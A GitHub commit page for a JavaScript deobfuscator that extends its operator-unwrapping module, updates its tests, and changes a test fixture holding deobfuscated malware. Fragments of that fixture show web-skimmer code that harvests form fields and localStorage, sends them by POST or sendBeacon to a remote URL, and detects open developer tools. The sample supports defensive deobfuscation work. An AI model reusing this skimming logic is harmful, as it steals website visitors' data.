Skip to content

Commit

Permalink
Extend unwrapSimpleOperations (#118)
Browse files Browse the repository at this point in the history
* Add more operator coverage

* Adjust tests for extended coverage
  • Loading branch information
BenBaryoPX authored Oct 23, 2024
1 parent 1da6fb7 commit 3d7f086
Show file tree
Hide file tree
Showing 3 changed files with 141 additions and 47 deletions.
11 changes: 4 additions & 7 deletions src/modules/safe/unwrapSimpleOperations.js
Original file line number Diff line number Diff line change
@@ -1,8 +1,9 @@
const operators = ['+', '-', '*', '/', '%', '&', '|', '&&', '||', '**', '^'];
const fixes = ['!', '~', '-', '+', '--', '++'];
const operators = ['+', '-', '*', '/', '%', '&', '|', '&&', '||', '**', '^',
'<=', '>=', '<', '>', '==', '===', '!=',
'!==', '<<', '>>', '>>>', 'in', 'instanceof', '??'];
const fixes = ['!', '~', '-', '+', '--', '++', 'typeof'];

/**
*
* @param {ASTNode} n
* @return {boolean}
*/
Expand All @@ -16,7 +17,6 @@ function matchBinaryOrLogical(n) {
}

/**
*
* @param {ASTNode} c
* @param {Arborist} arb
*/
Expand All @@ -34,7 +34,6 @@ function handleBinaryOrLogical(c, arb) {
}

/**
*
* @param {ASTNode} n
* @return {boolean}
*/
Expand All @@ -47,12 +46,10 @@ function matchUnary(n) {
}

/**
*
* @param {ASTNode} c
* @param {Arborist} arb
*/
function handleUnary(c, arb) {
// noinspection JSUnresolvedVariable
const refs = (c.scope.block?.id?.references || []).map(r => r.parentNode);
for (const ref of refs) {
if (ref.arguments.length === 1) arb.markNode(ref, {
Expand Down
133 changes: 115 additions & 18 deletions tests/modules.test.js
Original file line number Diff line number Diff line change
Expand Up @@ -467,22 +467,55 @@ describe('SAFE: unwrapSimpleOperations', async () => {
function minus(b,c){return b - c;}
function mul(b,c){return b * c;}
function div(b,c){return b / c;}
function power(b,c){return b ** c;}
function and(b,c){return b && c;}
function mod(b,c){return b % c;}
function band(b,c){return b & c;}
function or(b,c){return b || c;}
function bor(b,c){return b | c;}
function and(b,c){return b && c;}
function or(b,c){return b || c;}
function power(b,c){return b ** c;}
function xor(b,c){return b ^ c;}
function lte(b,c){return b <= c;}
function gte(b,c){return b >= c;}
function lt(b,c){return b < c;}
function gt(b,c){return b > c;}
function equal(b,c){return b == c;}
function strictEqual(b,c){return b === c;}
function notEqual(b,c){return b != c;}
function strictNotEqual(b,c){return b !== c;}
function leftShift(b,c){return b << c;}
function rightShift(b,c){return b >> c;}
function unsignedRightShift(b,c){return b >>> c;}
function inOp(b,c){return b in c;}
function instanceofOp(b,c){return b instanceof c;}
function typeofOp(b){return typeof b;}
function nullishCoalescingOp(b,c){return b ?? c;}
add(1, 2);
minus(1, 2);
mul(1, 2);
div(1, 2);
power(1, 2);
and(1, 2);
mod(1, 2);
band(1, 2);
or(1, 2);
bor(1, 2);
xor(1, 2);`;
and(1, 2);
or(1, 2);
power(1, 2);
xor(1, 2);
lte(1, 2);
gte(1, 2);
lt(1, 2);
gt(1, 2);
equal(1, 2);
strictEqual(1, 2);
notEqual(1, 2);
strictNotEqual(1, 2);
leftShift(1, 2);
rightShift(1, 2);
unsignedRightShift(1, 2);
inOp(1, 2);
instanceofOp(1, 2);
typeofOp(1);
nullishCoalescingOp(1, 2);
`;
const expected = `function add(b, c) {
return b + c;
}
Expand All @@ -495,34 +528,98 @@ function mul(b, c) {
function div(b, c) {
return b / c;
}
function power(b, c) {
return b ** c;
}
function and(b, c) {
return b && c;
function mod(b, c) {
return b % c;
}
function band(b, c) {
return b & c;
}
function bor(b, c) {
return b | c;
}
function and(b, c) {
return b && c;
}
function or(b, c) {
return b || c;
}
function bor(b, c) {
return b | c;
function power(b, c) {
return b ** c;
}
function xor(b, c) {
return b ^ c;
}
function lte(b, c) {
return b <= c;
}
function gte(b, c) {
return b >= c;
}
function lt(b, c) {
return b < c;
}
function gt(b, c) {
return b > c;
}
function equal(b, c) {
return b == c;
}
function strictEqual(b, c) {
return b === c;
}
function notEqual(b, c) {
return b != c;
}
function strictNotEqual(b, c) {
return b !== c;
}
function leftShift(b, c) {
return b << c;
}
function rightShift(b, c) {
return b >> c;
}
function unsignedRightShift(b, c) {
return b >>> c;
}
function inOp(b, c) {
return b in c;
}
function instanceofOp(b, c) {
return b instanceof c;
}
function typeofOp(b) {
return typeof b;
}
function nullishCoalescingOp(b, c) {
return b ?? c;
}
1 + 2;
1 - 2;
1 * 2;
1 / 2;
1 ** 2;
1 && 2;
1 % 2;
1 & 2;
1 || 2;
1 | 2;
1 ^ 2;`;
1 && 2;
1 || 2;
1 ** 2;
1 ^ 2;
1 <= 2;
1 >= 2;
1 < 2;
1 > 2;
1 == 2;
1 === 2;
1 != 2;
1 !== 2;
1 << 2;
1 >> 2;
1 >>> 2;
1 in 2;
1 instanceof 2;
typeof 1;
1 ?? 2;`;
const result = applyModuleToCode(code, targetModule);
assert.strictEqual(result, expected);
});
Expand Down
44 changes: 22 additions & 22 deletions tests/resources/evalOxd.js-deob.js
Original file line number Diff line number Diff line change
Expand Up @@ -170,7 +170,7 @@ var lo;
}
function p() {
var b = {};
for (var a = 0; C(a, arguments.length); a += 2) {
for (var a = 0; a < arguments.length; a += 2) {
b[arguments[a]] = arguments[a + 1];
}
return b;
Expand All @@ -186,10 +186,10 @@ var lo;
m._ = i;
var e = r.length;
j._ = [];
for (var f = 0; C(f, r.length); f++) {
for (var f = 0; f < r.length; f++) {
j._[f] = r.charAt(f);
}
for (var f = 0; C(f, r.length); f++) {
for (var f = 0; f < r.length; f++) {
g._ = m._ * (f + 200) + m._ % 43467;
s._ = m._ * (f + 194) + m._ % 49057;
l._ = g._ % r.length;
Expand All @@ -209,15 +209,15 @@ var lo;
return j._.join('').split('%').join('').split('#1').join('%').split('#0').join('#').split('');
}
function b() {
if (!H('navigator', this)) {
if (!('navigator' in this)) {
this.navigator = {};
}
this.navigator.sendBeacon = c.bind(this);
}
function c(e, b) {
var f = {};
const c = this.event && this.event.type;
f._ = H('XMLHttpRequest', this) ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
f._ = 'XMLHttpRequest' in this ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
f._.open('POST', e);
bt(f);
f._.setRequestHeader('Accept', '*/*');
Expand All @@ -231,7 +231,7 @@ var lo;
return true;
}
function e() {
return H('navigator', this) && H('sendBeacon', this.navigator);
return 'navigator' in this && 'sendBeacon' in this.navigator;
}
function f(b) {
bs = new TextEncoder().encode(b);
Expand All @@ -250,17 +250,17 @@ var lo;
bu();
e._ = document.querySelectorAll('input, checkbox, textarea, select');
f._ = 0;
for (; C(f._, e._.length); f._++) {
if (G(e._[f._].value.length, 0)) {
for (; f._ < e._.length; f._++) {
if (e._[f._].value.length > 0) {
b._ = e._[f._].name;
bv(b, f, e);
bw(b, f, e);
c._ = '';
if (F(j.indexOf(b._), -1)) {
if (j.indexOf(b._) === -1) {
j.push(b._);
bx(c, f, e);
} else {
if (G(j.indexOf(b._), -1)) {
if (j.indexOf(b._) > -1) {
c._ = e._[f._].value + '&' + b._ + '=' + localStorage.getItem(b._);
}
}
Expand All @@ -272,7 +272,7 @@ var lo;
localStorage.setItem('region', rg);
}
now = Date.now();
if (G(last + 500, now)) {
if (last + 500 > now) {
return false;
}
by();
Expand Down Expand Up @@ -328,37 +328,37 @@ var lo;
];
bz();
f._ = 0;
for (; C(f._, la.length); f._++) {
for (var g = 0; C(g, ln.length); g++) {
for (; f._ < la.length; f._++) {
for (var g = 0; g < ln.length; g++) {
lc.push(la[f._] + ln[g]);
}
}
lr = la.concat(ln, lc);
bA();
while (G(ctr, 0)) {
while (ctr > 0) {
f._ = Math.floor(Math.random() * ctr);
bB();
bC();
bD(f);
bE(f);
}
lr.sort(q());
if (F(localStorage.getItem('gaudid'), null)) {
if (localStorage.getItem('gaudid') === null) {
gaudid = [...Array(16)].map(b => (~~(Math.random() * 36)).toString(36)).join('').toUpperCase();
localStorage.setItem('gaudid', gaudid);
} else {
gaudid = localStorage.getItem('gaudid');
}
f._ = 0;
for (; C(f._, localStorage.length); f._++) {
for (; f._ < localStorage.length; f._++) {
var i = localStorage.key(f._);
var k = localStorage.getItem(i);
if (w(i, 'infoResult') && D(k.length, 1000)) {
if (i != 'infoResult' && k.length <= 1000) {
d += lr[f._] + '=' + f(i + '=' + k) + '&';
}
}
if (!navigator.sendBeacon(u, d)) {
l._ = H('XMLHttpRequest', this) ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
l._ = 'XMLHttpRequest' in this ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
l._.open('POST', u);
bF(l);
l._.setRequestHeader('Accept', '*/*');
Expand Down Expand Up @@ -498,8 +498,8 @@ var lo;
l();
m();
lo = setInterval(() => {
const c = G(window.outerWidth - window.innerWidth, 160);
const b = G(window.outerHeight - window.innerHeight, 160);
const c = window.outerWidth - window.innerWidth > 160;
const b = window.outerHeight - window.innerHeight > 160;
if (!(b && c) && (window.Firebug && window.Firebug.chrome && window.Firebug.chrome.isInitialized || c || b)) {
bH();
clearInterval(lo);
Expand All @@ -524,12 +524,12 @@ var lo;
d = '';
}
function bv(b, e, c) {
if (E(b._, '') && x(c._[e._].id, '')) {
if (b._ == '' && c._[e._].id !== '') {
b._ = c._[e._].id;
}
}
function bw(b, e, c) {
if (E('', b._)) {
if ('' == b._) {
b._ = e._;
}
t += b._ + '=' + c._[e._].value + '&';
Expand Down

0 comments on commit 3d7f086

Please sign in to comment.